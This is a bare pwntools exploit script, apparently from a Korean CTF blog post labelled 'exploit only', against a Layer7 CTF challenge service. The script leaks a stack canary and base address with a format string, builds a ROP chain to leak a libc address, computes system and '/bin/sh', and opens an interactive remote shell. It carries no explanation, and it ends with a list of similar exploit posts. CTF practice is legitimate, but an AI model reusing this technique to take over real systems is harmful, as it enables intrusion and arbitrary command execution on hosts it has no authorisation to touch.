from pwn import *
conn = remote('prob.layer7.kr', 10003)
payload = "2147483650\n"
payload += "%43$lx%41$lx"
conn.send(payload)
canary = conn.recv(16)
start = conn.recv(12)
print "canary : " + canary
print "start : " + start
base_addr = int(start,16) - 0x7e0
printf_plt = base_addr + 0x00000000000007A0
fflush_got = base_addr + 0x0000000000200FD8
puts_plt = base_addr + 0x0000000000000790
puts_got = base_addr + 0x0000000000200FA8
read_plt = base_addr + 0x00000000000007A8
read_got = base_addr + 0x0000000000200FC0
boom = base_addr + 0x0000000000000910
poprdiret = base_addr + 0x0000000000000a53
print "base_addr : " + hex(base_addr)
canary = int(canary, 16)
payload = "A" * 264
payload += p64(canary)
payload += "A" * 8
payload += p64(poprdiret)
payload += p64(fflush_got)
payload += p64(puts_plt)
payload += p64(boom)
conn.send(payload + "\n")
#-------------------------------------------------------------
payload = "2147483650\n"
payload += "aa"
conn.send(payload+"\n")
fflush_addr = u64(conn.recv(8)) - 0x610a000000000000
fflush_system = 0x000000000006D750 - 0x0000000000045380
fflush_binsh = 0x000000000006D750 - 0x000000000018C58B
system_addr = fflush_addr - fflush_system
binsh_addr = fflush_addr - fflush_binsh
print hex(fflush_addr)
print conn.recv(1024)
payload = "A" * 264
payload += p64(canary)
payload += "A" * 8
payload += p64(poprdiret)
payload += p64(binsh_addr)
payload += p64(system_addr)
payload += "A"*8
conn.send(payload)
while True:
cmd = raw_input('$ ')
conn.send(cmd+"\n")
print conn.recv(1024)
'CTF' 카테고리의 다른 글
| 2016 CSAW CTF tutorial exploit only (0) | 2016.09.26 |
|---|---|
| 2016 Layer7 CTF easy_fsb exploit only (0) | 2016.09.06 |
| codegate 2013 vuln200 from rop exploit only (0) | 2016.09.04 |
| angry_doraemon exploit only from pwntools (0) | 2016.08.28 |
| codegate nuclear pwn tools 사용 (0) | 2016.08.21 |